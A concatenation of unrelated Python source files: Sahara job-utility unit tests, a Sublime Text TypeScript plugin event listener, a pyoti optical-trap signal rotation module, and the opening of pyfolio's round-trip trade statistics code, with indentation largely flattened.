'params': {'param': 'value'}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
job_configs = {'args': ['first', name_ref],
'configs': {'config': 'value'},
'params': {'param': id}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
id2 = six.text_type(uuid.uuid4())
job_configs = {'args': [id, id2, name_ref],
'configs': {'config': id},
'params': {'param': id}}
self.assertItemsEqual([id, id2],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
@mock.patch('sahara.context.ctx')
@mock.patch('sahara.conductor.API.data_source_get_all')
def test_resolve_data_source_refs(self, data_source_get_all, ctx):
ctx.return_value = 'dummy'
name_ref = job_utils.DATA_SOURCE_PREFIX+'input'
job_exec_id = six.text_type(uuid.uuid4())
input = u.create_data_source("swift://container/input",
name="input",
id=six.text_type(uuid.uuid4()))
output = u.create_data_source("swift://container/output.%JOB_EXEC_ID%",
name="output",
id=six.text_type(uuid.uuid4()))
output_url = "swift://container/output." + job_exec_id
by_name = {'input': input,
'output': output}
by_id = {input.id: input,
output.id: output}
# Pretend to be the database
def _get_all(ctx, **kwargs):
name = kwargs.get('name')
if name in by_name:
name_list = [by_name[name]]
else:
name_list = []
id = kwargs.get('id')
if id in by_id:
id_list = [by_id[id]]
else:
id_list = []
return list(set(name_list + id_list))
data_source_get_all.side_effect = _get_all
job_configs = {
'configs': {
job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True},
'args': [name_ref, output.id, input.id]}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(2, len(ds))
self.assertEqual([input.url, output_url, input.url], nc['args'])
# Swift configs should be filled in since they were blank
self.assertEqual(input.credentials['user'],
nc['configs']['fs.swift.service.sahara.username'])
self.assertEqual(input.credentials['password'],
nc['configs']['fs.swift.service.sahara.password'])
job_configs['configs'] = {'fs.swift.service.sahara.username': 'sam',
'fs.swift.service.sahara.password': 'gamgee',
job_utils.DATA_SOURCE_SUBST_NAME: False,
job_utils.DATA_SOURCE_SUBST_UUID: True}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(2, len(ds))
self.assertEqual([name_ref, output_url, input.url], nc['args'])
# Swift configs should not be overwritten
self.assertEqual(job_configs['configs'], nc['configs'])
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: False}
job_configs['proxy_configs'] = {'proxy_username': 'john',
'proxy_password': 'smith',
'proxy_trust_id': 'trustme'}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(1, len(ds))
self.assertEqual([input.url, output.id, input.id], nc['args'])
# Swift configs should be empty and proxy configs should be preserved
self.assertEqual(job_configs['configs'], nc['configs'])
self.assertEqual(job_configs['proxy_configs'], nc['proxy_configs'])
# Substitution not enabled
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: False,
job_utils.DATA_SOURCE_SUBST_UUID: False}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(0, len(ds))
self.assertEqual(job_configs['args'], nc['args'])
self.assertEqual(job_configs['configs'], nc['configs'])
# Substitution enabled but no values to modify
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True}
job_configs['args'] = ['val1', 'val2', 'val3']
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(0, len(ds))
self.assertEqual(nc['args'], job_configs['args'])
self.assertEqual(nc['configs'], job_configs['configs'])
def test_construct_data_source_url_no_placeholders(self):
base_url = "swift://container/input"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
self.assertEqual(base_url, url)
def test_construct_data_source_url_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.out"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
self.assertEqual(
"swift://container/input." + job_exec_id + ".out", url)
def test_construct_data_source_url_randstr_placeholder(self):
base_url = "swift://container/input.%RANDSTR(4)%.%RANDSTR(7)%.out"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
        self.assertRegex(
            url, r"swift://container/input\.[a-z]{4}\.[a-z]{7}\.out")
|
|
import sublime_plugin
from ..libs.view_helpers import *
from ..libs import *
from .event_hub import EventHub
class TypeScriptEventListener(sublime_plugin.EventListener):
"""To avoid duplicated behavior among event listeners"""
# During the "close all" process, handling on_activated events is
# undesirable (not required and can be costly due to reloading buffers).
# This flag provides a way to know whether the "close all" process is
# happening so we can ignore unnecessary on_activated callbacks.
about_to_close_all = False
def on_activated(self, view):
log.debug("on_activated")
if TypeScriptEventListener.about_to_close_all:
return
if is_special_view(view):
self.on_activated_special_view(view)
else:
info = get_info(view)
if info:
self.on_activated_with_info(view, info)
def on_activated_special_view(self, view):
log.debug("on_activated_special_view")
EventHub.run_listeners("on_activated_special_view", view)
def on_activated_with_info(self, view, info):
log.debug("on_activated_with_info")
EventHub.run_listeners("on_activated_with_info", view, info)
def on_modified(self, view):
"""
Usually called by Sublime when the buffer is modified
not called for undo, redo
"""
log.debug("on_modified")
if is_special_view(view):
self.on_modified_special_view(view)
else:
info = get_info(view)
if info:
self.on_modified_with_info(view, info)
self.post_on_modified(view)
def on_modified_special_view(self, view):
log.debug("on_modified_special_view")
EventHub.run_listeners("on_modified_special_view", view)
def on_modified_with_info(self, view, info):
log.debug("on_modified_with_info")
        # A series of state updates on the info object to keep the file content in sync with the server
info.modified = True
# Todo: explain
if IS_ST2:
info.modify_count += 1
info.last_modify_change_count = change_count(view)
last_command, args, repeat_times = view.command_history(0)
if info.pre_change_sent:
# change handled in on_text_command
info.client_info.change_count = change_count(view)
info.pre_change_sent = False
else:
if last_command == "insert":
if (
"\n" not in args['characters'] # no new line inserted
and info.prev_sel # it is not a newly opened file
and len(info.prev_sel) == 1 # not a multi-cursor session
and info.prev_sel[0].empty() # the last selection is not a highlighted selection
and not info.client_info.pending_changes # no pending changes in the buffer
):
info.client_info.change_count = change_count(view)
prev_cursor = info.prev_sel[0].begin()
cursor = view.sel()[0].begin()
key = view.substr(sublime.Region(prev_cursor, cursor))
send_replace_changes_for_regions(view, static_regions_to_regions(info.prev_sel), key)
# mark change as handled so that on_post_text_command doesn't try to handle it
info.change_sent = True
else:
# request reload because we have strange insert
info.client_info.pending_changes = True
# Reload buffer after insert_snippet.
# For Sublime 2 only. In Sublime 3, this logic is implemented in
# on_post_text_command callback.
# Issue: https://github.com/Microsoft/TypeScript-Sublime-Plugin/issues/277
if IS_ST2 and last_command == "insert_snippet":
            reload_buffer(view)
# Other listeners
EventHub.run_listeners("on_modified_with_info", view, info)
def post_on_modified(self, view):
log.debug("post_on_modified")
EventHub.run_listeners("post_on_modified", view)
def on_selection_modified(self, view):
"""
Called by Sublime when the cursor moves (or when text is selected)
called after on_modified (when on_modified is called)
"""
log.debug("on_selection_modified")
        # Todo: why do we only check this here? Is there any way to globally disable the listener for non-TS files?
if not is_typescript(view):
return
EventHub.run_listeners("on_selection_modified", view)
info = get_info(view)
if info:
self.on_selection_modified_with_info(view, info)
def on_selection_modified_with_info(self, view, info):
log.debug("on_selection_modified_with_info")
if not info.client_info:
info.client_info = cli.get_or_add_file(view.file_name())
if (
info.client_info.change_count < change_count(view)
and info.last_modify_change_count != change_count(view)
):
# detected a change to the view for which Sublime did not call
# 'on_modified' and for which we have no hope of discerning
# what changed
info.client_info.pending_changes = True
# save the current cursor position so that we can see (in
# on_modified) what was inserted
info.prev_sel = regions_to_static_regions(view.sel())
EventHub.run_listeners("on_selection_modified_with_info", view, info)
def on_load(self, view):
log.debug("on_load")
EventHub.run_listeners("on_load", view)
def on_window_command(self, window, command_name, args):
log.debug("on_window_command")
if command_name == "hide_panel" and cli.worker_client.started():
cli.worker_client.stop()
elif command_name == "exit":
cli.service.exit()
elif command_name in ["close_all", "close_window", "close_project"]:
# Only set <about_to_close_all> flag if there exists at least one
# view in the active window. This is important because we need
# some view's on_close callback to reset the flag.
window = sublime.active_window()
if window is not None and window.views():
TypeScriptEventListener.about_to_close_all = True
def on_text_command(self, view, command_name, args):
"""
ST3 only (called by ST3 for some, but not all, text commands)
for certain text commands, learn what changed and notify the
server, to avoid sending the whole buffer during completion
or when key can be held down and repeated.
If we had a popup session active, and we get the command to
hide it, then do the necessary clean up.
"""
log.debug("on_text_command")
EventHub.run_listeners("on_text_command", view, command_name, args)
info = get_info(view)
if info:
self.on_text_command_with_info(view, command_name, args, info)
def on_text_command_with_info(self, view, command_name, args, info):
log.debug("on_text_command_with_info")
info.change_sent = True
info.pre_change_sent = True
if command_name == "left_delete":
# backspace
send_replace_changes_for_regions(view, left_expand_empty_region(view.sel()), "")
elif command_name == "right_delete":
# delete
send_replace_changes_for_regions(view, right_expand_empty_region(view.sel()), "")
else:
# notify on_modified and on_post_text_command events that
# nothing was handled. There are multiple flags because Sublime
# does not always call all three events.
info.pre_change_sent = False
info.change_sent = False
info.modified = False
EventHub.run_listeners("on_text_command_with_info", view, command_name, args, info)
def on_post_text_command(self, view, command_name, args):
"""
ST3 only
called by ST3 for some, but not all, text commands
not called for insert command
"""
log.debug("on_post_text_command")
info = get_info(view)
if info:
if not info.change_sent and info.modified:
self.on_post_text_command_with_info(view, command_name, args, info)
# we are up-to-date because either change was sent to server or
# whole buffer was sent to server
info.client_info.change_count = view.change_count()
# reset flags and saved regions used for communication among
# on_text_command, on_modified, on_selection_modified,
# on_post_text_command, and on_query_completion
info.change_sent = False
info.modified = False
info.completion_sel = None
def on_post_text_command_with_info(self, view, command_name, args, info):
log.debug("on_post_text_command_with_info")
if command_name not in \
["commit_completion",
"insert_best_completion",
"typescript_format_on_key",
"typescript_format_document",
"typescript_format_selection",
"typescript_format_line",
"typescript_paste_and_format"]:
# give up and send whole buffer to server (do this eagerly
# to avoid lag on next request to server)
reload_buffer(view, info.client_info)
EventHub.run_listeners("on_post_text_command_with_info", view, command_name, args, info)
def on_query_completions(self, view, prefix, locations):
log.debug("on_query_completions")
return EventHub.run_listener_with_return("on_query_completions", view, prefix, locations)
def on_query_context(self, view, key, operator, operand, match_all):
log.debug("on_query_context")
return EventHub.run_listener_with_return("on_query_context", view, key, operator, operand, match_all)
def on_close(self, view):
log.debug("on_close")
file_name = view.file_name()
info = get_info(view, open_if_not_cached=False)
if info:
info.is_open = False
if view.is_scratch() and view.name() == "Find References":
cli.dispose_ref_info()
else:
# info = get_info(view)
# if info:
# if info in most_recent_used_file_list:
# most_recent_used_file_list.remove(info)
# notify the server that the file is closed
cli.service.close(file_name)
# If this is the last view that is closed by a close_all command,
# reset <about_to_close_all> flag.
if TypeScriptEventListener.about_to_close_all:
window = sublime.active_window()
if window is None or not window.views():
TypeScriptEventListener.about_to_close_all = False
log.debug("all views have been closed")
def on_pre_save(self, view):
log.debug("on_pre_save")
check_update_view(view)
def on_hover(self, view, point, hover_zone):
log.debug("on_hover")
EventHub.run_listeners("on_hover", view, point, hover_zone)
|
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 21:36:44 2016
@author: Tobias Jachowski
"""
import matplotlib.pyplot as plt
import numpy as np
from pyoti.modification.modification import Modification, GraphicalMod
from pyoti import helpers as hp
from pyoti.evaluate import signal as sn
from pyoti.evaluate import tether as tr
class IRotation(GraphicalMod):
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Define some attributes needed for the graphical visualization of the
# spline
# plateaus [excited_psd, excited_position] for left and right stress
# regions
self.rightextension = None
self.leftextension = None
self.rightforce = {}
self.leftforce = {}
# Dimensions of the buttons to adjust the plateaus:
self.left = 0.1
self.bottom = 0.79
self.width = 0.0625
self.height = 0.046875
self.bspace = 0.01
self.lspace = 0.01333
# create some properties of actions/corresponding buttons
action = ['upX', 'downX', 'upY', 'downY', 'upZ', 'downZ', 'rotlX', 'rotrX', 'rotlY', 'rotrY', 'rotlZ', 'rotrZ']
label = ['upX', 'downX', 'upY', 'downY', 'upZ', 'downZ', 'rotlX', 'rotrX', 'rotlY', 'rotrY', 'rotlZ', 'rotrZ']
offsetX = [-0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
offsetY = [ 0.0, 0.0, -0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
offsetZ = [ 0.0, 0.0, 0.0, 0.0, -0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
rotateX = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5, -0.5, 0.0, 0.0, 0.0, 0.0 ]
rotateY = [ 0.0, 0.0, 0.0, 0.0, 0.0, -0.0, 0.0, 0.0, 0.5, -0.5, 0.0, 0.0 ]
rotateZ = [ 0.0, 0.0, 0.0, 0.0, 0.0, -0.0, 0.0, 0.0, 0.0, 0.0, 0.5, -0.5 ]
row = [ 1, 0, -6, -7, -6, -7, 1, 0, 1, 0, 1, 0 ]
column = [ 6, 6, 0, 0, 6, 6, 0, 0, 1, 1, 2, 2 ]
self.action = action
self.label = dict(list(zip(action, label)))
self.offsetX = dict(list(zip(action, offsetX)))
self.offsetY = dict(list(zip(action, offsetY)))
self.offsetZ = dict(list(zip(action, offsetZ)))
self.rotateX = dict(list(zip(action, rotateX)))
self.rotateY = dict(list(zip(action, rotateY)))
self.rotateZ = dict(list(zip(action, rotateZ)))
self.row = dict(list(zip(action, row)))
self.column = dict(list(zip(action, column)))
self._axes = ['3D', 'X', 'Y', 'Z']
self._lines = {}
self.supertitle = None
self._button = {}
def _figure(self):
"""
Interactive determination of rotation angle.
"""
        # Adjust the angles for rotation of the QPD signal
# create new figure and axes for adjusting the angles
plot_params = {'wspace': 0.09, 'hspace': 0.08}
self._set_plot_params(plot_params)
figure, ax_ = plt.subplots(2, 2, sharex=True, sharey=False)
ax = dict(list(zip(self._axes, ax_.flatten())))
# Create buttons for interactive correction of plateaus and assign
# correct functions
# See http://math.andrej.com/2009/04/09/pythons-lambda-is-broken/ for
# explanation of weird function assignment
ax_button = {}
for ac in self.action:
ax_button[ac] \
= figure.add_axes([self.column[ac] *
(self.lspace + self.width) +
self.left, self.row[ac] *
(self.bspace + self.height) +
self.bottom,
self.width,
self.height])
self._button[ac] = plt.Button(ax_button[ac], self.label[ac])
def ap(event, ac=ac):
self._adjust_plateaus(ac)
# connect button to action, accordingly
self._button[ac].on_clicked(ap)
# create lines to plot the data
for plot in self._axes:
self._lines['left' + plot] = ax[plot].plot([0], [0], 'r',
alpha=0.75)[0]
self._lines['right' + plot] = ax[plot].plot([0], [0], 'g',
alpha=0.75)[0]
ax[plot].ticklabel_format(useOffset=False)
ax[plot].grid(True)
ax['3D'].set_ylabel('Force (pN)')
ax['Y'].set_ylabel('Force (pN)')
ax['Y'].set_xlabel('Extension (nm)')
ax['Z'].set_xlabel('Extension (nm)')
self.supertitle = figure.suptitle("Adjust plateaus to make them "
"overlap")
return figure
def _update_fig(self, **kwargs):
"""
Update the plot
"""
# prepare data for interactive plot
self.calculate_plateaus()
for plot in self._axes:
l_line = self._lines['left' + plot]
r_line = self._lines['right' + plot]
l_line.set_data(self.leftextension * 1e9,
self.leftforce[plot] * 1e12)
r_line.set_data(self.rightextension * 1e9,
self.rightforce[plot] * 1e12)
# recompute ax.dataLim
l_line.axes.relim()
# update ax.viewLim using new dataLim
l_line.axes.autoscale_view()
def _pre_close_fig(self):
        # Store attachment fit plot for documentation
self.supertitle.set_text('Adjusted plateaus')
self._lines.clear()
self._button.clear()
self.supertitle = None
def _adjust_plateaus(self, action):
"""
Adjusts the attachment (offset of excited_position) and the the scaling
factor to correct for differences of left and right DNA overstretching
plateaus. It is interactively called from the data plot (see below) and
updates the plot accordingly.
"""
# change offset and scaling for plateaus
self.modification.iattributes.offsetPsdX += self.offsetX[action]
self.modification.iattributes.offsetPsdY += self.offsetY[action]
self.modification.iattributes.offsetPsdZ += self.offsetZ[action]
self.modification.iattributes.angleX += self.rotateX[action]
self.modification.iattributes.angleY += self.rotateY[action]
self.modification.iattributes.angleZ += self.rotateZ[action]
# recalculate the plateaus with the new offset and scaling values
self.update_fig()
def calculate_plateaus(self):
"""
Calculate the plateaus according to the offsets and the angles of
data_based.
"""
# recalculate data for plotting
traces = ['psdX', 'psdY', 'psdZ', 'positionX', 'positionY',
'positionZ']
data_based = self.modification._get_data_based(
traces=traces, window=False, decimate=True)
# subtract offsets
data_based[:, 0] -= self.modification.iattributes.offsetPsdX
data_based[:, 1] -= self.modification.iattributes.offsetPsdY
data_based[:, 2] -= self.modification.iattributes.offsetPsdZ
# set positionZ and calibration, needed by
# self.rotate -> self.rot_factor
        # make sure that both the position signal and the calibration are
        # taken from the same view (self.modification.view_based)
positionZ = data_based[:, hp.slicify(5)]
calibration = self.modification.view_based.calibration
# rotate psd
data_based[:, 0], data_based[:, 1], data_based[:, 2] \
= self.modification.rotate(
data_based[:, 0], data_based[:, 1],
data_based[:, 2], positionZ, calibration)
# set some variable names for easy access of data_based
psdXYZ = data_based[:, hp.slicify([0, 1, 2])]
positionXYZ = data_based[:, hp.slicify([3, 4, 5])]
positionXY = data_based[:, hp.slicify([3, 4])]
positionZ = data_based[:, hp.slicify(5)]
# calculate extension
distanceXYZ = tr.distanceXYZ(positionXYZ, psdXYZ=psdXYZ,
calibration=calibration)
distance = tr.distance(distanceXYZ, positionXY)
extension = tr.extension(distance, calibration.radius)
# calculate force
displacementXYZ = calibration.displacement(psdXYZ, positionZ=positionZ)
# Get the force acting in the same direction as the displacement
fXYZ = calibration.force(displacementXYZ, positionZ=positionZ)
force = tr.force(tr.forceXYZ(psdXYZ, calibration=calibration,
positionZ=positionZ),
positionXY)
force = {'3D': force,
'X': fXYZ[:, 0],
'Y': fXYZ[:, 1],
'Z': fXYZ[:, 2]}
# determine regions where DNA is stretched to the right and left side
ex = self.modification._excited()
excited_position = self.modification._NAME['position'][ex]
positionEl = traces.index(excited_position)
signal = data_based[:, positionEl] # [positionE]
resolution = self.modification.view_based.samplingrate \
/ self.modification.decimate
minima, maxima = sn.get_extrema(signal, resolution)
rightstress, _, leftstress \
= sn.get_sections(signal, minima, maxima)[1][0:3]
# set plateau data arrays
self.rightextension = extension[rightstress]
self.leftextension = extension[leftstress]
for plot in self._axes:
self.rightforce[plot] = force[plot][rightstress]
self.leftforce[plot] = force[plot][leftstress]
class Rotation(Modification):
GRAPHICALMOD = IRotation
def __init__(self, **kwargs):
traces_apply = ['psdX', 'psdY', 'psdZ']
super().__init__(datapoints=12000, traces_apply=traces_apply, **kwargs)
# Define parameters that are used to calculate the modification
# the angles the ellipsoid has to be rotated
# rotation around X
self.add_iattribute('angleX', description='Angle about X (deg)',
value=0.0)
self.add_iattribute('angleY', description='Angle about Y (deg)',
value=0.0)
self.add_iattribute('angleZ', description='Angle about Z (deg)',
value=0.0)
# offset of PSD relative to trap center position of bead
self.add_iattribute('offsetPsdX', description='Offset PSD X (V)',
value=0.0)
self.add_iattribute('offsetPsdY', description='Offset PSD Y (V)',
value=0.0)
self.add_iattribute('offsetPsdZ', description='Offset PSD Z (V)',
value=0.0)
# Parameters for rotation matrix calculation
self.rotation_method = 'm' # 'N', 'm' or 'V'
def _print_info(self):
print((" Rotation is in '%s' space" % self.rotation_method))
def _modify(self, data, samples, data_traces, data_index, mod_index):
        # Get data that is needed for the rotation modification but is not
        # contained in the data array that is requested to be modified
        # (`data_traces` in `data`)
needed_traces = self.traces_apply # traces_apply
needed_traces.append('positionZ') # psdX, psdY, psdZ, positionZ
# calculate missing traces
extra_traces = hp.missing_elements(needed_traces, data_traces)
extra_data = self._get_data_apply(samples=samples, traces=extra_traces,
copy=False)
# combine assigned data and traces with extra fetched data and traces
traces_tuple = (data_traces, extra_traces)
data_tuple = (data, extra_data)
# function to easily get data for a trace from different data
def get_target_data(target_trace, traces_tuple, data_tuple):
target_data = None
for i, traces in enumerate(traces_tuple):
if target_trace in traces:
index = traces.index(target_trace)
target_data = data_tuple[i][:, index]
return target_data
# get psdX, psdY and psdZ
l_data = {}
for trace in self.traces_apply:
l_data[trace] = get_target_data(trace, traces_tuple, data_tuple)
# correct for offset of psds
x = self.iattributes.offsetPsdX
y = self.iattributes.offsetPsdY
z = self.iattributes.offsetPsdZ
if x != 0.0:
l_data['psdX'] = l_data['psdX'] - x
if y != 0.0:
l_data['psdY'] = l_data['psdY'] - y
if z != 0.0:
l_data['psdZ'] = l_data['psdZ'] - z
# positionZ and calibration, needed by
# self.rotate -> self.rot_factor
        # make sure that both the position signal and the calibration are
        # taken from self.view_apply
positionZ = get_target_data('positionZ', traces_tuple, data_tuple)
calibration = self.view_apply.calibration
# rotate the data
l_data['psdX'], l_data['psdY'], l_data['psdZ'] \
= self.rotate(l_data['psdX'], l_data['psdY'], l_data['psdZ'],
positionZ, calibration)
for trace in self.traces_apply:
if trace in data_traces:
index = data_traces.index(trace)
data[:, index] = l_data[trace]
return data
def rotate(self, data_x, data_y, data_z, positionZ, calibration):
ax = self.iattributes.angleX
ay = self.iattributes.angleY
az = self.iattributes.angleZ
if ax == 0.0 and ay == 0.0 and az == 0.0:
return (data_x, data_y, data_z)
x = ax * np.pi / 180.0
y = ay * np.pi / 180.0
z = az * np.pi / 180.0
cf = self.calibration_factor(positionZ, calibration)
rf = self.rot_factor
# https://www.siggraph.org/education/materials/HyperGraph/modeling/mod_tran/3drota.htm
# angle about axis ...
x_o = data_x
y_o = data_y
z_o = data_z
# right handed coordinate system
# rotation is counterclockwise about the axis coming out of the image
# plane
# z should always be <= 0 (negative), because the bead is stressed down
#
# rotate about x
#
# z |
# |
# |
# |_______ y
# /
# /
# x /
#
if x == 0.0:
y_2 = y_o
z_2 = z_o
else:
cos_x = np.cos(x)
sin_x = np.sin(x)
y_2 = y_o * cos_x - z_o * rf(2, 1, cf) * sin_x
z_2 = z_o * cos_x + y_o * rf(1, 2, cf) * sin_x
# rotate about y
#
# x |
# |
# |
# |_______ z
# /
# /
# y /
#
if y == 0.0:
z_o = z_2
x_2 = x_o
else:
cos_y = np.cos(y)
sin_y = np.sin(y)
z_o = z_2 * cos_y - x_o * rf(0, 2, cf) * sin_y
x_2 = x_o * cos_y + z_2 * rf(2, 0, cf) * sin_y
# rotate about z
#
# y |
# |
# |
# |_______ x
# /
# /
# z /
#
if z == 0.0:
x_o = x_2
y_o = y_2
else:
cos_z = np.cos(z)
sin_z = np.sin(z)
x_o = x_2 * cos_z - y_2 * rf(1, 0, cf) * sin_z
y_o = y_2 * cos_z + x_2 * rf(0, 1, cf) * sin_z
return (x_o, y_o, z_o)
def calibration_factor(self, positionZ, calibration):
# position signal, to calculate height dependent calibration factors
if positionZ.ndim < 2:
positionZ = positionZ[:, np.newaxis]
# rotation in m space
if self.rotation_method == 'm':
# beta in m/V, displacement sensitivity
beta = calibration.beta(positionZ)[:, 0:3]
factor = beta
# rotation in pN space
elif self.rotation_method == 'N':
# beta in m/V, displacement sensitivity
beta = calibration.beta(positionZ)[:, 0:3]
# N/m, stiffness
kappa = calibration.kappa(positionZ)[:, 0:3]
factor = kappa * beta
else:
# self.rotation_method == 'V' # rotation in V space
factor = 1.0
return factor
def rot_factor(self, a, b, calibration_factor):
"""
Calculates a weighting factor for rotating the 3D QPD signal in V via
the signal in N (stiffness * displacement_sensitivity), m
(displacement_sensitivity), or V space.
(If you rotate a vector in N space, the absolute value (force) should
stay the same, regardless of the axis. A rotation in V space would lead
to bias, due to the different displacement sensitivities and
stiffnesses of all three axes.)
        To calculate the factors, this method uses the calibration of the
        view this modification is applied to.
"""
cf = calibration_factor
if self.rotation_method == 'm' or self.rotation_method == 'N':
factor = cf[:, a] / cf[:, b]
else:
factor = 1.0
return factor
def Rxyz(self, positionZ, calibration, x=0.0, y=0.0, z=0.0):
"""
Create rotationmatrix along x, y and z in degrees.
Rotation for data with N samples and 3 dimensions (XYZ):
R = Rxyz(x,y,z)
data_rot = np.dot(data, R.T)
Rxyz takes the mean() of the rotation factors, calculated by
self.rot_factor()!
"""
# angle about axis ...
x = x * np.pi / 180.0
y = y * np.pi / 180.0
z = z * np.pi / 180.0
        # calculate the mean weighting factors; rot_factor() expects the
        # calibration factor, not positionZ and calibration directly
        cf = self.calibration_factor(positionZ, calibration)
        f = self.rot_factor
        fXY = np.mean(f(0, 1, cf))
        fXZ = np.mean(f(0, 2, cf))
        fYX = np.mean(f(1, 0, cf))
        fYZ = np.mean(f(1, 2, cf))
        fZX = np.mean(f(2, 0, cf))
        fZY = np.mean(f(2, 1, cf))
Rx = np.matrix([[ 1.0, 0.0, 0.0 ],
[ 0.0, np.cos(x), -fZY*np.sin(x) ],
[ 0.0, fYZ*np.sin(x), np.cos(x) ]])
Ry = np.matrix([[ np.cos(y), 0.0, -fZX*np.sin(y) ],
[ 0.0, 1.0, 0.0 ],
[ fXZ*np.sin(y), 0.0, np.cos(y) ]])
Rz = np.matrix([[ np.cos(z), -fYX*np.sin(z), 0.0 ],
[ fXY*np.sin(z), np.cos(z), 0.0 ],
[ 0.0, 0.0, 1.0 ]])
return Rx*Ry*Rz
# The following is only to update to database version 0.8.0
class GRotation(Rotation):
pass
|
|
#
# Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from math import copysign
import warnings
from collections import deque, OrderedDict
import pandas as pd
import numpy as np
from .utils import print_table, format_asset
PNL_STATS = OrderedDict(
[('Total profit', lambda x: x.sum()),
('Gross profit', lambda x: x[x > 0].sum()),
('Gross loss', lambda x: x[x < 0].sum()),
('Profit factor', lambda x: x[x > 0].sum() / x[x < 0].abs().sum()
if x[x < 0].abs().sum() != 0 else np.nan),
('Avg. trade net profit', 'mean'),
('Avg. winning trade', lambda x: x[x > 0].mean()),
('Avg. losing trade', lambda x: x[x < 0].mean()),
('Ratio Avg. Win:Avg. Loss', lambda x: x[x > 0].mean() /
x[x < 0].abs().mean() if x[x < 0].abs().mean() != 0 else np.nan),
('Largest winning trade', 'max'),
('Largest losing trade', 'min'),
])
SUMMARY_STATS = OrderedDict(
[('Total number of round_trips', 'count'),
('Percent profitable', lambda x: len(x[x > 0]) / float(len(x))),
('Winning round_trips', lambda x: len(x[x > 0])),
('Losing round_trips', lambda x: len(x[x < 0])),
('Even round_trips', lambda x: len(x[x == 0])),
])
RETURN_STATS = OrderedDict(
[('Avg returns all round_trips', lambda x: x.mean()),
('Avg returns winning', lambda x: x[x > 0].mean()),
('Avg returns losing', lambda x: x[x < 0].mean()),
('Median returns all round_trips', lambda x: x.median()),
('Median returns winning', lambda x: x[x > 0].median()),
('Median returns losing', lambda x: x[x < 0].median()),
('Largest winning trade', 'max'),
('Largest losing trade', 'min'),
])
DURATION_STATS = OrderedDict(
[('Avg duration', lambda x: x.mean()),
('Median duration', lambda x: x.median()),
('Longest duration', lambda x: x.max()),
('Shortest duration', lambda x: x.min())
# FIXME: Instead of x.max() - x.min() this should be
# rts.close_dt.max() - rts.open_dt.min() which is not
# available here. As it would require a new approach here
# that passes in multiple fields we disable these measures
# for now.
# ('Avg # round_trips per day', lambda x: float(len(x)) /
# (x.max() - x.min()).days),
# ('Avg # round_trips per month', lambda x: float(len(x)) /
# (((x.max() - x.min()).days) / APPROX_BDAYS_PER_MONTH)),
])
def agg_all_long_short(round_trips, col, stats_dict):
stats_all = (round_trips
.assign(ones=1)
.groupby('ones')[col]
.agg(stats_dict)
.T
.rename(columns={1.0: 'All trades'}))
stats_long_short = (round_trips
.groupby('long')[col]
.agg(stats_dict)
.T
.rename(columns={False: 'Short trades',
True: 'Long trades'}))
return stats_all.join(stats_long_short)
def _groupby_consecutive(txn, max_delta=pd.Timedelta('8h')):
"""Merge transactions of the same direction separated by less than
max_delta time duration.
Parameters
----------
transactions : pd.DataFrame
        Prices and amounts of executed trades. One row per trade.
- See full explanation in tears.create_full_tear_sheet
max_delta : pandas.Timedelta (optional)
Merge transactions in the same direction separated by less
than max_delta time duration.
Returns
-------
transactions : pd.DataFrame
"""
def vwap(transaction):
if transaction.amount.sum() == 0:
warnings.warn('Zero transacted shares, setting vwap to nan.')
return np.nan
return (transaction.amount * transaction.price).sum() / \
transaction.amount.sum()
out = []
for _, t in txn.groupby('symbol'):
t = t.sort_index()
t.index.name = 'dt'
t = t.reset_index()
t['order_sign'] = t.amount > 0
t['block_dir'] = (t.order_sign.shift(
1) != t.order_sign).astype(int).cumsum()
t['block_time'] = ((t.dt.sub(t.dt.shift(1))) >
max_delta).astype(int).cumsum()
grouped_price = (t.groupby(['block_dir',
'block_time'])
.apply(vwap))
grouped_price.name = 'price'
grouped_rest = t.groupby(['block_dir', 'block_time']).agg({
'amount': 'sum',
'symbol': 'first',
'dt': 'first'})
grouped = grouped_rest.join(grouped_price)
out.append(grouped)
out = pd.concat(out)
out = out.set_index('dt')
return out
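# An illustrative sketch, not part of the library: given the logic above, two
# same-direction AAPL buys less than max_delta apart should collapse into a
# single row priced at their vwap. The symbol, prices and timestamps below are
# hypothetical.
#
#     import pandas as pd
#
#     txn = pd.DataFrame(
#         {'symbol': ['AAPL', 'AAPL'],
#          'amount': [10, 10],
#          'price': [50.0, 100.0]},
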